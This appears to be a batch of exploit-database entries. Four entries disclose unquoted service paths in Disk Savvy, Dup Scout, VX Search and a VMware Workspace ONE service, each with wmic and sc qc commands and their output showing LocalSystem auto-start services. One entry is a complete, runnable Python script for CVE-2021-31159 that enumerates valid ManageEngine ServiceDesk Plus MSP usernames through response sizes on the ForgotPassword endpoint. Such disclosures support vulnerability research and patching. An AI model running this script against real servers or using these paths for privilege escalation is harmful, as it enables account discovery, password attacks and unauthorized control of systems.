# Exploit Title: Disk Savvy 13.6.14 - 'Multiple' Unquoted Service Path # Discovery by: Brian Rodriguez # Date: 16-06-2021 # Vendor Homepage: https://www.disksavvy.com # Software Links: # https://www.disksavvy.com/setups_x64/disksavvysrv_setup_v13.6.14_x64.exe # https://www.disksavvy.com/setups_x64/disksavvyent_setup_v13.6.14_x64.exe # Tested Version: 13.6.14 # Vulnerability Type: Unquoted Service Path # Tested on: Windows 10 Enterprise 64 bits # Step to discover Unquoted Service Path: C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """ Disk Savvy Server Disk Savvy Server C:\Program Files\Disk Savvy Server\bin\disksvs.exe Auto Disk Savvy Enterprise Disk Savvy Enterprise C:\Program Files\Disk Savvy Enterprise\bin\disksvs.exe Auto C:\>sc qc "Disk Savvy Server" [SC] QueryServiceConfig CORRECTO NOMBRE_SERVICIO: Disk Savvy Server TIPO : 10 WIN32_OWN_PROCESS TIPO_INICIO : 2 AUTO_START CONTROL_ERROR : 0 IGNORE NOMBRE_RUTA_BINARIO: C:\Program Files\Disk Savvy Server\bin\disksvs.exe GRUPO_ORDEN_CARGA : ETIQUETA : 0 NOMBRE_MOSTRAR : Disk Savvy Server DEPENDENCIAS : NOMBRE_INICIO_SERVICIO: LocalSystem C:\>sc qc "Disk Savvy Enterprise" [SC] QueryServiceConfig CORRECTO NOMBRE_SERVICIO: Disk Savvy Enterprise TIPO : 10 WIN32_OWN_PROCESS TIPO_INICIO : 2 AUTO_START CONTROL_ERROR : 0 IGNORE NOMBRE_RUTA_BINARIO: C:\Program Files\Disk Savvy Enterprise\bin\disksvs.exe GRUPO_ORDEN_CARGA : ETIQUETA : 0 NOMBRE_MOSTRAR : Disk Savvy Enterprise DEPENDENCIAS : NOMBRE_INICIO_SERVICIO: LocalSystem

# Exploit Title: Dup Scout 13.5.28 - 'Multiple' Unquoted Service Path # Discovery by: Brian Rodriguez # Date: 16-06-2021 # Vendor Homepage: https://www.dupscout.com # Software Links: # https://www.dupscout.com/setups_x64/dupscoutsrv_setup_v13.5.28_x64.exe # https://www.dupscout.com/setups_x64/dupscoutent_setup_v13.5.28_x64.exe # Tested Version: 13.5.28 # Vulnerability Type: Unquoted Service Path # Tested on: Windows 10 Enterprise 64 bits # Step to discover Unquoted Service Path: C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """ Dup Scout Server Dup Scout Server C:\Program Files\Dup Scout Server\bin\dupscts.exe Auto Dup Scout Enterprise Dup Scout Enterprise C:\Program Files\Dup Scout Enterprise\bin\dupscts.exe Auto C:\>sc qc "Dup Scout Server" [SC] QueryServiceConfig CORRECTO NOMBRE_SERVICIO: Dup Scout Server TIPO : 10 WIN32_OWN_PROCESS TIPO_INICIO : 2 AUTO_START CONTROL_ERROR : 0 IGNORE NOMBRE_RUTA_BINARIO: C:\Program Files\Dup Scout Server\bin\dupscts.exe GRUPO_ORDEN_CARGA : ETIQUETA : 0 NOMBRE_MOSTRAR : Dup Scout Server DEPENDENCIAS : NOMBRE_INICIO_SERVICIO: LocalSystem C:\>sc qc "Dup Scout Enterprise" [SC] QueryServiceConfig CORRECTO NOMBRE_SERVICIO: Dup Scout Enterprise TIPO : 10 WIN32_OWN_PROCESS TIPO_INICIO : 2 AUTO_START CONTROL_ERROR : 0 IGNORE NOMBRE_RUTA_BINARIO: C:\Program Files\Dup Scout Enterprise\bin\dupscts.exe GRUPO_ORDEN_CARGA : ETIQUETA : 0 NOMBRE_MOSTRAR : Dup Scout Enterprise DEPENDENCIAS : NOMBRE_INICIO_SERVICIO: LocalSystem

# Exploit Title: Zoho ManageEngine ServiceDesk Plus MSP 9.4 - User Enumeration # Date: 17/06/2021 # Exploit Author: Ricardo Ruiz (@ricardojoserf) # CVE: CVE-2021-31159 (https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-31159) # Vendor Homepage: https://www.manageengine.com # Vendor Confirmation: https://www.manageengine.com/products/service-desk-msp/readme.html#10519 # Version: Previous to build 10519 # Tested on: Zoho ManageEngine ServiceDesk Plus 9.4 # Example: python3 exploit.py -t http://example.com/ -d DOMAIN -u USERSFILE [-o OUTPUTFILE] # Repository (for updates and fixing bugs): https://github.com/ricardojoserf/CVE-2021-31159 import argparse import requests import urllib3 urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) def get_args(): parser = argparse.ArgumentParser() parser.add_argument('-d', '--domain', required=True, action='store', help='Domain to attack') parser.add_argument('-t', '--target', required=True, action='store', help='Target Url to attack') parser.add_argument('-u', '--usersfile', required=True, action='store', help='Users file') parser.add_argument('-o', '--outputfile', required=False, default="listed_users.txt", action='store', help='Output file') my_args = parser.parse_args() return my_args def main(): args = get_args() url = args.target domain = args.domain usersfile = args.usersfile outputfile = args.outputfile s = requests.session() s.get(url) resp_incorrect = s.get(url+"/ForgotPassword.sd?userName="+"nonexistentuserforsure"+"&dname="+domain, verify = False) incorrect_size = len(resp_incorrect.content) print("Incorrect size: %s"%(incorrect_size)) correct_users = [] users = open(usersfile).read().splitlines() for u in users: resp = s.get(url+"/ForgotPassword.sd?userName="+u+"&dname="+domain, verify = False) valid = (len(resp.content) != incorrect_size) if valid: correct_users.append(u) print("User: %s Response size: %s (correct: %s)"%(u, len(resp.content),str(valid))) print("\nCorrect users\n") with open(outputfile, 'w') as f: for user in correct_users: f.write("%s\n" % user) print("- %s"%(user)) print("\nResults stored in %s\n"%(outputfile)) if __name__ == "__main__": main()

# Exploit Title: VX Search 13.5.28 - 'Multiple' Unquoted Service Path # Discovery by: Brian Rodriguez # Date: 16-06-2021 # Vendor Homepage: https://www.vxsearch.com # Software Links: # https://www.vxsearch.com/setups_x64/vxsearchsrv_setup_v13.5.28_x64.exe # https://www.vxsearch.com/setups_x64/vxsearchent_setup_v13.5.28_x64.exe # Tested Version: 13.5.28 # Vulnerability Type: Unquoted Service Path # Tested on: Windows 10 Enterprise 64 bits # Step to discover Unquoted Service Path: C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """ VX Search Server VX Search Server C:\Program Files\VX Search Server\bin\vxsrchs.exe Auto VX Search Enterprise VX Search Enterprise C:\Program Files\VX Search Enterprise\bin\vxsrchs.exe Auto C:\>sc qc "VX Search Server" [SC] QueryServiceConfig CORRECTO NOMBRE_SERVICIO: VX Search Server TIPO : 10 WIN32_OWN_PROCESS TIPO_INICIO : 2 AUTO_START CONTROL_ERROR : 0 IGNORE NOMBRE_RUTA_BINARIO: C:\Program Files\VX Search Server\bin\vxsrchs.exe GRUPO_ORDEN_CARGA : ETIQUETA : 0 NOMBRE_MOSTRAR : VX Search Server DEPENDENCIAS : NOMBRE_INICIO_SERVICIO: LocalSystem C:\>sc qc "VX Search Enterprise" [SC] QueryServiceConfig CORRECTO NOMBRE_SERVICIO: VX Search Enterprise TIPO : 10 WIN32_OWN_PROCESS TIPO_INICIO : 2 AUTO_START CONTROL_ERROR : 0 IGNORE NOMBRE_RUTA_BINARIO: C:\Program Files\VX Search Enterprise\bin\vxsrchs.exe GRUPO_ORDEN_CARGA : ETIQUETA : 0 NOMBRE_MOSTRAR : VX Search Enterprise DEPENDENCIAS : NOMBRE_INICIO_SERVICIO: LocalSystem

# Exploit Title: Workspace ONE Intelligent Hub 20.3.8.0 - 'VMware Hub Health Monitoring Service' Unquoted Service Path # Discovery by: Ismael Nava # Discovery Date: 06-16-2021 # Vendor Homepage: https://www.vmware.com/mx/products/workspace-one/intelligent-hub.html # Software Links : https://getwsone.com/ # Tested Version: 20.3.8.0 # Vulnerability Type: Unquoted Service Path # Tested on OS: Windows 10 Enterprise 64 bits # Step to discover Unquoted Service Path: C:\>wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" |findstr /i /v """ VMware Hub Health Monitoring Service VMware Hub Health Monitoring Service C:\Program Files (x86)\Airwatch\HealthMonitoring\Service\VMwareHubHealthMonitoring.exe Auto C:\>sc qc "VMware Hub Health Monitoring Service" [SC] QueryServiceConfig CORRECTO NOMBRE_SERVICIO: VMware Hub Health Monitoring Service TIPO : 10 WIN32_OWN_PROCESS TIPO_INICIO : 2 AUTO_START CONTROL_ERROR : 1 NORMAL NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\Airwatch\HealthMonitoring\Service\VMwareHubHealthMonitoring.exe GRUPO_ORDEN_CARGA : ETIQUETA : 0 NOMBRE_MOSTRAR : VMware Hub Health Monitoring Service DEPENDENCIAS : NOMBRE_INICIO_SERVICIO: LocalSystem